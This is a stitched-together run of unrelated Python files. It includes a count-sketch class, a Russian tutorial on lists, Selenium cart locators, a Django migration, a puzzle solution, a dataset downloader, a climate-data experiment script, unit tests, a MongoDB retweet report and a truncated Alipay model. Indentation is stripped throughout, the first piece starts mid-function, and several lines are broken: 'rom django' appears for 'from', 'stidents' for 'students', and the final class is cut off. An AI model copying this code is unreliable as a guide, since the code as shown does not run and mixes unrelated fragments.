# topk on cuda returns what looks like uninitialized memory if
# vals has nan values in it
# saving to a zero-initialized output array instead of using the
# output of topk appears to solve this problem
outVals = torch.zeros(k, device=vals.device)
HHs = torch.zeros(k, device=vals.device).long()
torch.topk(vals**2, k, sorted=False, out=(outVals, HHs))
return HHs, vals[HHs]
def _findHHThr(self, thr):
assert(thr is not None)
vals = self._findAllValues()
HHs = vals.abs() >= thr
return HHs, vals[HHs]
""" this is a potentially faster way to compute the same thing,
but it doesn't play nicely with numBlocks > 1, so for now I'm
just using the slower code above
# to figure out which items are heavy hitters, check whether
# self.table exceeds thr (in magnitude) in at least r/2 of
# the rows. These elements are exactly those for which the median
# exceeds thr, but computing the median is expensive, so only
# calculate it after we identify which ones are heavy
tablefiltered = ( (self.table > thr).float()
- (self.table < -thr).float())
est = torch.zeros(self.d, device=self.device)
for r in range(self.r):
est += tablefiltered[r, self.buckets[r,:]] * self.signs[r, :]
est = ( (est >= math.ceil(self.r/2.)).float()
- (est <= -math.ceil(self.r/2.)).float())
# HHs - heavy coordinates
HHs = torch.nonzero(est)
return HHs, self._findValues(HHs)
"""
def _findValues(self, coords):
# estimating frequency of input coordinates
assert(self.numBlocks == 1)
d = coords.size()[0]
vals = torch.zeros(self.r, self.d, device=self.device)
for r in range(self.r):
vals[r] = (self.table[r, self.buckets[r, coords]]
* self.signs[r, coords])
return vals.median(dim=0)[0]
def _findAllValues(self):
if self.numBlocks == 1:
vals = torch.zeros(self.r, self.d, device=self.device)
for r in range(self.r):
vals[r] = (self.table[r, self.buckets[r,:]]
* self.signs[r,:])
return vals.median(dim=0)[0]
else:
medians = torch.zeros(self.d, device=self.device)
for blockId in range(self.numBlocks):
start = blockId * self.buckets.size()[1]
end = (blockId + 1) * self.buckets.size()[1]
end = min(end, self.d)
vals = torch.zeros(self.r, end-start, device=self.device)
for r in range(self.r):
buckets = self.buckets[r, :end-start]
signs = self.signs[r, :end-start]
offsetBuckets = buckets + self.blockOffsets[blockId]
offsetBuckets %= self.c
offsetSigns = signs * self.blockSigns[blockId]
vals[r] = (self.table[r, offsetBuckets]
* offsetSigns)
medians[start:end] = vals.median(dim=0)[0]
return medians
def _findHHs(self, k=None, thr=None):
assert((k is None) != (thr is None))
if k is not None:
return self._findHHK(k)
else:
return self._findHHThr(thr)
def unSketch(self, k=None, epsilon=None):
""" Performs heavy-hitter recovery on the sketch
Args:
k: if not None, the number of heavy hitters to recover
epsilon: if not None, the approximation error in the recovery.
The returned heavy hitters are estimated to be greater
than epsilon * self.l2estimate()
Returns:
A vector containing the heavy hitters, with zero everywhere
else
Note:
exactly one of k and epsilon must be non-None
"""
# either epsilon or k might be specified
# (but not both). Act accordingly
if epsilon is None:
thr = None
else:
thr = epsilon * self.l2estimate()
hhs = self._findHHs(k=k, thr=thr)
if k is not None:
assert(len(hhs[1]) == k)
if epsilon is not None:
assert((hhs[1] < thr).sum() == 0)
# the unsketched vector is 0 everywhere except for HH
# coordinates, which are set to the HH values
unSketched = torch.zeros(self.d, device=self.device)
unSketched[hhs[0]] = hhs[1]
return unSketched
def l2estimate(self):
""" Return an estimate of the L2 norm of the sketch """
# l2 norm esimation from the sketch
return np.sqrt(torch.median(torch.sum(self.table**2,1)).item())
@classmethod
def median(cls, csvecs):
# make sure all CSVecs match
d = csvecs[0].d
c = csvecs[0].c
r = csvecs[0].r
device = csvecs[0].device
numBlocks = csvecs[0].numBlocks
for csvec in csvecs:
assert(csvec.d == d)
assert(csvec.c == c)
assert(csvec.r == r)
assert(csvec.device == device)
assert(csvec.numBlocks == numBlocks)
tables = [csvec.table for csvec in csvecs]
med = torch.median(torch.stack(tables), dim=0)[0]
returnCSVec = copy.deepcopy(csvecs[0])
returnCSVec.table = med
return returnCSVec
|
students = ['Ivan', 'Masha', 'Sasha']
for student in students:
print('Hello,' + student + '!')
# Доступ происходит с помощью инднксов
students = ['Ivan', 'Masha', 'Sasha']
#Длина списка: len(students)
# Доступ к эл.списка осуществляется как и к строкам
#так же берем и отрицательные индексы
students[-1] 'Sasha'
students[-2] 'Masha'
students[-3] 'Ivan'
#Опрерации со списками
+
students = ['Ivan', 'Masha', 'Sasha']
teachers = ['Oleg', 'Alex']
students + teachers
Результат: ['Ivan', 'Masha', 'Sasha','Oleg', 'Alex']
*
[0,1]*4
Результат: [0,1,0,1,0,1,0,1]
# Изменение списков
#В отличчии от изученных типов данных
(int, float, str) списки (list) являются ИЗМЕНЯЕМЫМИ
#Изменение конкретного элемента списка
students = ['Ivan', 'Masha', 'Sasha']
students[1] = 'Oleg'
print(students)
#Результат: ['Ivan', 'Oleg', 'Sasha']
#Добавление элемента списка
students = ['Ivan', 'Masha', 'Sasha']
students.append('Olga')
#Результат: ['Ivan', 'Masha', 'Sasha', 'Olga']
students += ['Olga']
#Результат: ['Ivan', 'Masha', 'Sasha', 'Olga', 'Olga']
students += ['Boris', 'Sergey']
#Результат: ['Ivan', 'Masha', 'Sasha', 'Olga', 'Olga','Boris', 'Sergey']
#Пустой список:
students = []
# Вставка элементов списка
students = ['Ivan', 'Masha', 'Sasha']
students.insert(1,'Olga')
#Результат: ['Ivan', 'Olga', 'Masha', 'Sasha']
students = ['Ivan', 'Masha', 'Sasha']
students += ['Olga']
students += 'Olga'
print(students)
#Результат: ['Ivan', 'Masha', 'Sasha', 'Olga', 'O', 'l', 'g', 'a']
#Удаление элемента из списка
students = ['Ivan', 'Masha', 'Sasha']
students.remove('Sasha')
#или
del students[0]
#Поиск элемента в списке
# 1 способ
students = ['Ivan', 'Masha', 'Sasha']
if 'Ivan' in students:
print('Ivan is here')
if 'Ann' not in students:
print('Ann is out')
# 2 способ
ind = students.index('Sasha')
#Результат: 2
ind = students.index('Ann')
#Результат: ValueError: 'Ann' is not in list
#Сортировка списка
# 1 Способ не меняет сам список
students = ['Sasha','Ivan', 'Masha']
ordered_students = sorted(students)
#Результат: ['Ivan', 'Masha', 'Sasha']
# 2 способ меняет сам список
students.sort()
#Результат: ['Ivan', 'Masha', 'Sasha']
#Если не нужно сортировать весь список, а нужно только получить
#самого первого или самого последнего используем (элементы должны быть сравнимы)
min()
max()
# Список в обратном порядке(Изменяет сам список)
students = ['Sasha','Ivan', 'Masha']
students.reverse()
#Результат: ['Masha', 'Ivan', 'Sasha']
# не изменяют сам список:
reversed(students)
stidents[::-1]
# Присвоение списков
a = [1, 'A', 2]
b = a
a[0] = 42
#Значение a: [42, 'A', 2]
#Значение b: [42, 'A', 2]
b[2] = 30
#Значение b: [42, 'A', 30]
#Значение a: [42, 'A', 30]
# Генерация списков
a = [0]*5
a = [0 for i in range(5)]
a = [i * i for i in range(5)]
a = [int(i) for i in input().split()] #split - делит строку по пробелам
#Напишите программу, на вход которой подается одна строка с целыми числами.
#Программа должна вывести сумму этих чисел.
a = [int(i) for i in input().split()]
print(sum(a))
#На вход подаётся список чисел одной строкой.
#Программа должна для каждого элемента этого списка вывести сумму двух его соседей.
#Для элементов списка, являющихся крайними, одним из соседей считается элемент,
#находящий на противоположном конце этого списка.
#Если на вход пришло только одно число, надо вывести его же.
#Вывод должен содержать одну строку с числами нового списка, разделёнными пробелом.
a = [int(i) for i in input().split()]
l = len(a)- 1
s = 0
nov = []
i = 0
if len(a) == 0:
print(str(0))
else:
for ai in a:
if len(a) > 1:
if i == 0:
s = a[i+1] + a[-1]
nov.append(s)
elif i > 0 and i < l:
s = a[i-1] + a[i+1]
nov.append(s)
elif i == l:
s = a[i-1] + a[0]
nov.append(s)
elif len(a) == 1:
s = a[i]
nov.append(s)
i += 1
j = 0
for ai2 in nov:
print(str(nov[j])+' ', end='')
j += 1
#На вход подается список чисел в одной строке, вывод в
#одну строку повторяющихся более одного раза значений.
#Выводимые числа не должны повторяться, порядок их вывода
#может быть произвольным.
s = [ int(i) for i in input().split()]
nov = []
s.sort()
l = len(s)-1
k = 100000
if len(s)!=1:
for i in range(0,l):
if s[i] == s[i+1] and s[i] != k:
nov.append(s[i])
k = s[i]
for j in range(l,l+1):
if s[-1] == s[-2] and s[j] != k:
nov.append(s[j])
n = len(nov)
for g in range(0,n):
print(nov[g],end=' ')
# Генерация двумерных списков
a = [[1,2,3],[4,5,6],[7,8,9]]
a[1] -> [4,5,6]
a[1][1] -> 5
# Инициализация дум.списков
n = 3
a = [[0]*n]*n
a[0][0] = 5 #в первом стобце все элементы 5
# Зависимый список поскольку создали строку из n нулей и скопировали ссылку на нее n раз
#Создание n списков из n нулей, где каждый список будет независимый
a = [[0] * n for i in range(n)]
a =[[0 for j in range(n)] for i in range(n)]
|
from tests.UAT.page_models.book import Book
# The Cart constant page contains all the web locator for the cart page
# The ID for add to cart button
ADD_TO_CART_BUTTON_ID = "add-to-cart-button"
# The id for the cart icon picture located on the top of the page
CART_ICON_ID = "nav-cart"
# The dropdown ID for quantity needed to increment or decrement the items in the cart
CART_QUANTITY_DROP_DOWN_ID = "item_quantity"
# The CSS selector for the first item in the cart
FIRST_ITEM_NAME_IN_CART_CSS_SELECTOR = ".sc-product-title"
# The CSS SELECTION link for turning an item into a gift
GIFT_CHECKBOX_CSS_SELECTOR = ".sc-gift-option > label:nth-child(1) > input:nth-child(1)"
# The CSS Selector to the heading that displayed just above the item when it is saved e.g. 'saved item (1 item)'
SAVE_FOR_LATER_HEADING_CSS_SELECTOR = ".sc-list-caption"
# The cart id for the sub total number of items displayed for the cart e.g 'subtotal (1 items): $5.99'
SUB_TOTAL_CART_ID = "sc-subtotal-label-activecart"
# The dropdown class name for needed to increment or decrement the items in the cart
SHOPPING_CART_QUANTITY_DROPDOWN_CLASS_NAME = "select.a-native-dropdown"
# The cart heading tag that displayed above the cart
CART_H2_TAG = "h2"
# Book titles needed for testing
_TEST_AUTOMATION = Book.Title.TEST_AUTOMATION
_AGILE_TESTING = Book.Title.AGILE_TESTING
_SELENIUM_WEBDRIVER = Book.Title.SELENIUM_WEB_DRIVER
# The CSS SELECTOR for the 'save later link' for the items for the Selenium webdriver, Agile Testing and testing automation
_AGILE_TESTING_SAVE_FOR_LATER_CSS_SELECTOR = NotImplemented
_SELENIUM_WEB_DRIVER_SAVE_FOR_LATER_CSS_SELECTOR = NotImplemented
_TEST_AUTOMATION_SAVE_FOR_LATER_CSS_SELECTOR = "div.sc-list-item:nth-child(3) > div:nth-child(4) > " \
"div:nth-child(1) > div:nth-child(1) > div:nth-child(1) " \
"> div:nth-child(1) > div:nth-child(2) > div:nth-child(2)" \
" > span:nth-child(3) > span:nth-child(1) > input:nth-child(1)"
# The CSS SELECTOR for the delete link for the items for the Selenium webdriver, Agile Testing and testing automation
_SELENIUM_WEB_DRIVER_DELETE_LINK_CSS_SELECTOR = ".sc-action-delete > span:nth-child(1) > input:nth-child(1)"
_TEST_AUTOMATION_DELETE_LINK_CSS_SELECTOR = NotImplemented
_AGILE_TESTING_DELETE_LINK_CSS_SELECTOR = "div.sc-list-item:nth-child(2) > div:nth-child(4) > div:nth-child(1) >" \
" div:nth-child(1) > div:nth-child(1) > div:nth-child(1) >" \
" div:nth-child(2) > div:nth-child(2) > span:nth-child(1) > " \
"span:nth-child(1) > input:nth-child(1)"
data = {
"save_item_for_later": {_TEST_AUTOMATION: _TEST_AUTOMATION_SAVE_FOR_LATER_CSS_SELECTOR,
_AGILE_TESTING: _SELENIUM_WEB_DRIVER_SAVE_FOR_LATER_CSS_SELECTOR,
_SELENIUM_WEBDRIVER: _SELENIUM_WEB_DRIVER_SAVE_FOR_LATER_CSS_SELECTOR
},
"delete_from_cart": {_TEST_AUTOMATION: _TEST_AUTOMATION_DELETE_LINK_CSS_SELECTOR,
_AGILE_TESTING: _AGILE_TESTING_DELETE_LINK_CSS_SELECTOR,
_SELENIUM_WEBDRIVER: _SELENIUM_WEB_DRIVER_DELETE_LINK_CSS_SELECTOR
}
} |
# Generated by Django 3.1 on 2020-08-23 04:56
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, verbose_name='名前')),
('category', models.PositiveIntegerField(choices=[(1, 'tops'), (2, 'bottoms')], verbose_name='カテゴリ')),
('image', models.FileField(upload_to='', verbose_name='画像')),
('color', models.PositiveIntegerField(choices=[(1, 'black'), (2, 'white'), (3, 'blue'), (4, 'yellow'), (5, 'else')], verbose_name='色')),
('posession', models.BooleanField(verbose_name='所有')),
('shopname', models.CharField(max_length=255, null=True, verbose_name='店名')),
('shopurl', models.CharField(max_length=1028, null=True, verbose_name='URL')),
],
),
]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
@Author : Ven
@Date : 2020/12/10
"""
INPUT = []
with open("2020-10.data") as f:
for i in f.read().split("\n"):
INPUT.append(int(i))
INPUT.append(0)
INPUT.append(max(INPUT) + 3)
INPUT.sort()
print(INPUT)
VAR_1 = ""
for i in range(0, len(INPUT) - 1):
VAR_1 += str(INPUT[i + 1] - INPUT[i])
VAR_2 = VAR_1.split("3")
print(VAR_2)
def check(cha):
length = len(cha)
if length < 2:
return 1
elif length == 2:
return 2
elif length == 3:
return 4
elif length == 4:
return 7
else:
raise Exception(length)
answer = 1
for one in VAR_2:
answer *= check(one)
print(answer)
|
import os
import errno
from torchvision.datasets.utils import download_url, extract_archive
class DataSetDownloader:
def __init__(self, root_dir, dataset_title, download=False):
"""
Parameters:
root_dir: root directory of data set
dataset_title: title of dataset for download
download: flag, True - data set should be downloaded, else the value is False
"""
self.root_dir = root_dir
self.dataset_title = dataset_title
self.download = download
self.full_root_dir = os.path.join(self.root_dir, self.dataset_title)
if download:
self.download_dataset()
if not os.path.exists(self.full_root_dir):
raise RuntimeError('Data set was not found, please, use download=True to download it')
def download_dataset(self):
""" Download dataset if it does not exist in the specified directory """
# pylint: disable=R1721
if os.path.exists(self.full_root_dir) and len([elem for elem in os.scandir(self.full_root_dir)]) >= 2:
print("The data set has been already downloaded")
return
# create root dir
try:
os.makedirs(self.full_root_dir)
except OSError as error_obj:
if error_obj.errno != errno.EEXIST:
raise
dataset_url = self._dataset_mapper()
archive_name = dataset_url.rpartition('/')[2]
self._get_dataset(dataset_url, filename=archive_name)
def _dataset_mapper(self):
""" Verifies data set title and returns url of data set"""
dataset_map = {
'tiny-imagenet-200': 'http://cs231n.stanford.edu/tiny-imagenet-200.zip',
'PennFudanPed': 'https://www.cis.upenn.edu/~jshi/ped_html/PennFudanPed.zip'
}
if self.dataset_title in dataset_map:
return dataset_map[self.dataset_title]
raise KeyError(
'{} data set was not found. Check its title or choose another one from the list: {}'.format(
self.dataset_title, list(dataset_map.keys())
)
)
def _get_dataset(self, url, filename=None, remove_finished=True):
self.full_root_dir = os.path.expanduser(self.full_root_dir)
if not filename:
filename = os.path.basename(url)
print('Downloading {}...'.format(self.dataset_title))
download_url(url, self.full_root_dir, filename)
archive = os.path.join(self.full_root_dir, filename)
print("Extracting {} to {}".format(archive, self.root_dir))
extract_archive(archive, self.root_dir, remove_finished)
print("Done!")
|
import sys, os
from pyprojroot import here
root = here(project_files=[".here"])
sys.path.append(str(here()))
from typing import Dict, Optional, Union, Any
from collections import namedtuple
import pathlib
import argparse
import pandas as pd
from tqdm import tqdm
import numpy as np
import time
import joblib
import xarray as xr
import logging
# Experiment Functions
from src.data.esdc import get_dataset
from src.features.temporal import select_period, TimePeriod, remove_climatology
from src.features.spatial import (
get_spain,
select_region,
get_europe,
get_northern_hemisphere,
get_southern_hemisphere,
)
from sklearn.preprocessing import StandardScaler
from src.models.density import get_rbig_model
from src.models.utils import parallel_predictions
from src.features.utils import subset_indices
from src.features.density import get_density_cubes, get_information_cubes
from src.features.preprocessing import (
standardizer_data,
get_reference_cube,
get_common_indices,
)
from sklearn.utils import check_random_state
logging.basicConfig(
level=logging.INFO,
stream=sys.stdout,
format=f"%(asctime)s: %(levelname)s: %(message)s",
)
logger = logging.getLogger()
# logger.setLevel(logging.INFO)
SPATEMP = namedtuple("SPATEMP", ["spatial", "temporal", "dimensions"])
RNG = check_random_state(123)
RES_PATH = pathlib.Path(str(root)).joinpath("data/spa_temp/info_earth/world")
def get_parameters(args) -> Dict:
parameters = {}
# ======================
# Variable
# ======================
if args.variable == "gpp":
parameters["variable"] = ["gross_primary_productivity"]
elif args.variable == "sm":
parameters["variable"] = ["soil_moisture"]
elif args.variable == "lst":
parameters["variable"] = ["land_surface_temperature"]
elif args.variable == "lai":
parameters["variable"] = ["leaf_area_index"]
elif args.variable == "rm":
parameters["variable"] = ["root_moisture"]
elif args.variable == "precip":
parameters["variable"] = ["precipitation"]
else:
raise ValueError("Unrecognized variable")
# ======================
# Region
# ======================
if args.region == "spain":
parameters["region"] = get_spain()
elif args.region == "europe":
parameters["region"] = get_europe()
elif args.region == "world":
parameters["region"] = ["world"]
elif args.region == "north":
parameters["region"] = get_northern_hemisphere()
elif args.region == "south":
parameters["region"] = get_southern_hemisphere()
else:
raise ValueError("Unrecognized region")
# ======================
# Period
# ======================
if args.period == "2010":
parameters["period"] = TimePeriod(name="2010", start="Jan-2010", end="Dec-2010")
elif args.period == "2002_2010":
parameters["period"] = TimePeriod(
name="2002_2010", start="Jan-2002", end="Dec-2010"
)
return parameters
def experiment_step(args: argparse.Namespace,) -> Union[Any, Any]:
logging.info(f"Extracting Parameters")
parameters = get_parameters(args)
# ======================
# experiment - Data
# ======================
# Get DataCube
logging.info(f"Loading '{parameters['variable'][0]}' variable")
datacube = get_dataset(parameters["variable"])
# ======================
# RESAMPLE
# ======================
if args.resample:
logging.info(f"Resampling datacube...")
datacube = datacube.resample(time="1MS").mean()
# ======================
# SPATIAL SUBSET
# ======================
try:
logging.info(f"Selecting region '{parameters['region'].name}'")
datacube = select_region(xr_data=datacube, bbox=parameters["region"])[
parameters["variable"]
]
except:
logging.info(f"Selecting region 'world'")
# ======================
# CLIMATOLOGY (TEMPORAL)
# ======================
if args.clima:
logging.info("Removing climatology...")
datacube, _ = remove_climatology(datacube)
# ======================
# TEMPORAL SUBSET
# ======================
logging.info(f"Selecting temporal period: '{parameters['period'].name}'")
datacube = select_period(xr_data=datacube, period=parameters["period"])
# ======================
# DENSITY CUBES
# ======================
logging.info(f"Getting density cubes: S: {args.spatial}, T: {args.temporal}")
if isinstance(datacube, xr.Dataset):
datacube = datacube[parameters["variable"][0]]
density_cube_df = get_density_cubes(
data=datacube, spatial=args.spatial, temporal=args.temporal,
)
logging.info(f"Total data: {density_cube_df.shape}")
# ======================
# STANDARDIZE DATA
# ======================
logging.info(f"Standardizing data...")
x_transformer = StandardScaler().fit(density_cube_df.values)
density_cube_df_norm = pd.DataFrame(
data=x_transformer.transform(density_cube_df.values),
columns=density_cube_df.columns.values,
index=density_cube_df.index,
)
# ======================
# SUBSAMPLE DATA
# ======================
if args.smoke_test:
logging.info(f"Smoke Test...")
logging.info(f"Subsampling datacube...")
idx = subset_indices(
density_cube_df_norm.values, subsample=1000, random_state=100
)
X = density_cube_df_norm.iloc[idx, :].values
index = density_cube_df_norm.iloc[idx, :].index
elif args.subsample is not None:
logging.info(f"Subsampling datacube...")
idx = subset_indices(
density_cube_df_norm.values, subsample=args.subsample, random_state=100
)
X = density_cube_df_norm.iloc[idx, :].values
index = density_cube_df_norm.index
else:
X = density_cube_df_norm.values
index = density_cube_df_norm.index
logging.info(f"Input shape: {X.shape}")
parameters["input_shape"] = X.shape
# =========================
# Model - Gaussianization
# =========================
# Gaussianize the data
logging.info(f"Gaussianizing data...")
t0 = time.time()
rbig_model = get_rbig_model(X=X, method=args.method)
rbig_model.fit(X)
t1 = time.time() - t0
logging.info(f"Time Taken: {t1:.2f} secs")
parameters["rbig_fit_time"] = t1
# =========================
# PROB ESTIMATES
# =========================
logging.info(f"Getting probability estimates...")
t0 = time.time()
# add noise
if args.add_noise:
logging.info(f"Adding noise to values for probability...")
density_cube_df_norm.values += 1e-1 * RNG.rand(
*density_cube_df_norm.values.shape
)
logging.info(f"Parallel predictions...")
if args.smoke_test:
X_prob = parallel_predictions(
X=X, func=rbig_model.predict_proba, batchsize=100, n_jobs=-1, verbose=1,
)
else:
X_prob = parallel_predictions(
X=density_cube_df_norm.values,
func=rbig_model.predict_proba,
batchsize=10_000,
n_jobs=-1,
verbose=1,
)
t1 = time.time() - t0
logging.info(f"Time Taken: {t1:.2f} secs")
parameters["prob_size"] = density_cube_df_norm.values.shape
parameters["rbig_predict_time"] = t1
X_prob = pd.DataFrame(data=X_prob, index=index, columns=["probability"])
# returning density cubes
logging.info(f"Getting information cubes.")
X_prob = get_information_cubes(X_prob, time=args.temporal_mean)
X_prob.attrs = parameters
return X_prob
def main(args):
logging.info("Getting parameters...")
logging.info("Getting save path...")
save_name = (
f"{args.save}_"
f"{args.region}_"
f"{args.variable}_"
f"{args.period}_"
f"s{args.subsample}_"
f"d{args.spatial}{args.spatial}{args.temporal}"
)
if args.resample:
save_name += f"_rs{args.resample}"
X_prob = experiment_step(args=args)
# ======================
# SAVING
# ======================
# # Model + Transform
# logging.info(f"Saving rbig model and transformer...")
# model = {"rbig": rbig_model, "x_transform": x_transformer, "parameters": parameters}
# joblib.dump(model, RES_PATH.joinpath(f"models/{save_name}.joblib"))
# # Data
# logging.info(f"Saving data...")
# with open(RES_PATH.joinpath(f"cubes/{save_name}.csv"), "w") as f:
# density_cube_df.to_csv(f, header=True)
# Probabilities
logging.info(f"Saving estimated probabilities...")
# with open(RES_PATH.joinpath(f"probs/{save_name}.h5"), "w") as f:
X_prob.to_netcdf(RES_PATH.joinpath(f"prob_cubes/{save_name}.h5"), "w")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Arguments for GP experiment.")
parser.add_argument(
"--res", default="low", type=str, help="Resolution for datacube"
)
parser.add_argument(
"-v", "--variable", default="gpp", type=str, help="Variable to use"
)
parser.add_argument(
"-s", "--save", default="v0", type=str, help="Save name for experiment."
)
parser.add_argument(
"--njobs", type=int, default=-1, help="number of processes in parallel",
)
parser.add_argument(
"--subsample", type=int, default=200_000, help="subset points to take"
)
parser.add_argument(
"--region", type=str, default="spain", help="Region to be Gaussianized"
)
parser.add_argument(
"--temporal", type=int, default=1, help="Number of temporal dimensions",
)
parser.add_argument(
"--spatial", type=int, default=1, help="Number of spatial dimensions"
)
parser.add_argument(
"--period", type=str, default="2010", help="Period to do the Gaussianization"
)
parser.add_argument(
"--hemisphere", type=str, default="top", help="Hemisphere for data"
)
parser.add_argument(
"-rs", "--resample", type=str, default=None, help="Resample Frequency"
)
parser.add_argument("-m", "--method", type=str, default="old", help="RBIG Method")
parser.add_argument("-sm", "--smoke-test", action="store_true")
parser.add_argument("-tm", "--temporal-mean", action="store_true")
parser.add_argument("-c", "--clima", action="store_true")
parser.add_argument("-n", "--add-noise", action="store_true")
main(parser.parse_args())
|
"""
Documents Model Unittests
Copyright (c) 2018 Qualcomm Technologies, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the
limitations in the disclaimer below) provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following
disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of Qualcomm Technologies, Inc. nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY
THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
from app.api.v1.models.documents import Documents
def test_get_label_by_id(session):
"""Verify that the get_label_by_id() returns correct document label when id is provided."""
docs = [
Documents(id=111, label='shp doc', type=1, required=True),
Documents(id=211, label='ath doc', type=1, required=True)
]
session.bulk_save_objects(docs)
session.commit()
assert Documents.get_label_by_id(111) == 'shp doc'
assert Documents.get_label_by_id(211) == 'ath doc'
assert Documents.get_label_by_id(2334242323322) is None
def test_get_document_by_id(session):
"""Verify that the get_document_by_id returns a document provided an id."""
docs = [
Documents(id=1110, label='shp doc', type=1, required=True),
Documents(id=2110, label='ath doc', type=1, required=True)
]
session.bulk_save_objects(docs)
session.commit()
assert Documents.get_document_by_id(1110)
assert Documents.get_document_by_id(2110)
assert Documents.get_document_by_id(79897777879) is None
def test_get_document_by_name(session):
"""Verify that the get_document_by_name() returns a document provided the name."""
docs = [
Documents(id=11101, label='shp doc', type=1, required=True),
Documents(id=21102, label='ath doc', type=2, required=True)
]
session.bulk_save_objects(docs)
session.commit()
assert Documents.get_document_by_name('shp doc', 1)
assert Documents.get_document_by_name('ath doc', 2)
assert Documents.get_document_by_name('88668', 1) is None
def test_get_documents(session):
"""Verify that the get_documents() returns all the documents of same type."""
docs = [
Documents(id=11101003, label='shp doc', type=1, required=True),
Documents(id=21102004, label='ath doc', type=1, required=True),
Documents(id=11101005, label='shp doc', type=2, required=True),
Documents(id=21102006, label='ath doc', type=2, required=True)
]
session.bulk_save_objects(docs)
session.commit()
docs_1 = Documents.get_documents('registration')
assert docs_1
for doc in docs_1:
assert doc.type == 1
docs_2 = Documents.get_documents('avddd')
assert docs_1
for doc in docs_2:
assert doc.type == 2
def test_required_docs(session):
"""Verify that the required_docs() only returns docs for which the required flag is true."""
docs = [
Documents(id=111010034, label='shp doc', type=1, required=True),
Documents(id=211020045, label='ath doc', type=1, required=False),
Documents(id=111010056, label='shp doc', type=2, required=True),
Documents(id=211020067, label='ath doc', type=2, required=True)
]
session.bulk_save_objects(docs)
session.commit()
docs = Documents.get_required_docs('registration')
for doc in docs:
assert doc.required
docs = Documents.get_required_docs('avdd')
for doc in docs:
assert doc.required
|
#!/usr/bin/env python3
import json
from statistics import stdev
from sys import argv
from datetime import datetime
from pymongo import MongoClient
def consume(source='apple--2018-09-03T13-11-54.json'):
# open connection
client = MongoClient('localhost', 27017)
db = client.hw2
# load + insert
with open(source) as f:
data = json.load(f)
if data:
db.hw2col.insert(data)
# close connection
client.close()
def analyze(outfile='report.json'):
# open connection
client = MongoClient('localhost', 27017)
db = client.hw2
cursor_full = db.hw2col.find({
'timestamp': {
'$regex':'^(2013-[08|09|10|11|12]|201[4-7]|2018-[01|02|03|04|05|06|07|08])',
},
'retweets': {
'$gte': '0',
},
})
print('=============================================')
print('Retweets on apple')
print('=============================================')
retweets_full = []
for document in cursor_full:
retweets_full.append(int(document['retweets']))
print('Duration: 2013-08-xx through 2018-08-xx')
print('Retweets >= 0')
print('')
print('')
print('total retweets: {:.2f}'.format(sum(retweets_full)))
print('mean retweets: {:.2f}'.format(sum(retweets_full) / len(retweets_full)))
print('stdev retweets: {:.2f}'.format(stdev(retweets_full)))
print('=============================================')
print('')
cursor_eq1 = db.hw2col.find({
'timestamp': {
'$regex':'^(2013-[08|09|10|11|12]|201[4-7]|2018-[01|02|03|04|05|06|07|08])',
},
'retweets': {
'$eq': '1',
},
})
retweets_eq1 = []
for document in cursor_eq1:
retweets_eq1.append(int(document['retweets']))
print('Duration: 2013-08-xx through 2018-08-xx')
print('Retweets = 1')
print('')
print('')
print('total retweets: {:.2f}'.format(sum(retweets_eq1)))
print('mean retweets: {:.2f}'.format(sum(retweets_eq1) / len(retweets_eq1)))
print('stdev retweets: {:.2f}'.format(stdev(retweets_eq1)))
print('=============================================')
cursor_gt1 = db.hw2col.find({
'timestamp': {
'$regex':'^(2013-[08|09|10|11|12]|201[4-7]|2018-[01|02|03|04|05|06|07|08])',
},
'retweets': {
'$gt': '1',
},
})
retweets_gt1 = []
for document in cursor_gt1:
retweets_gt1.append(int(document['retweets']))
print('Duration: 2013-08-xx through 2018-08-xx')
print('Retweets > 1')
print('')
print('')
print('total retweets: {:.2f}'.format(sum(retweets_gt1)))
print('mean retweets: {:.2f}'.format(sum(retweets_gt1) / len(retweets_gt1)))
print('stdev retweets: {:.2f}'.format(stdev(retweets_gt1)))
print('=============================================')
# close connection
client.close()
if __name__ == '__main__':
if argv[1] and argv[1] == 'consume':
consume(*argv[2:])
elif argv[1] and argv[1] == 'analyze':
analyze(*argv[2:])
|
from rank.util import purge
def main(_in, _out):
title = _in.read()
from rank.collect.movie import get_comments
for comment in get_comments(title.strip()):
_out.write("| {0}\n".format(purge(comment)))
if __name__ == "__main__":
import sys
main(sys.stdin, sys.stdout)
|
rom django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string
def send_welcome_email(name, receiver):
pass |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayFundTransIcrowdTagModifyModel(object):
def __init__(self):
self._mobile = None
self._scene_code = None
self._tag_code = None
self._tag_value = None
self._user_id = None
@property
def mobile(self):
return self._mobile
@mobile.setter
def mobile(self, value):
self._mobile = value
@property
def scene_code(self):
return self._scene_code
@scene_code.setter
def scene_code(self, value):
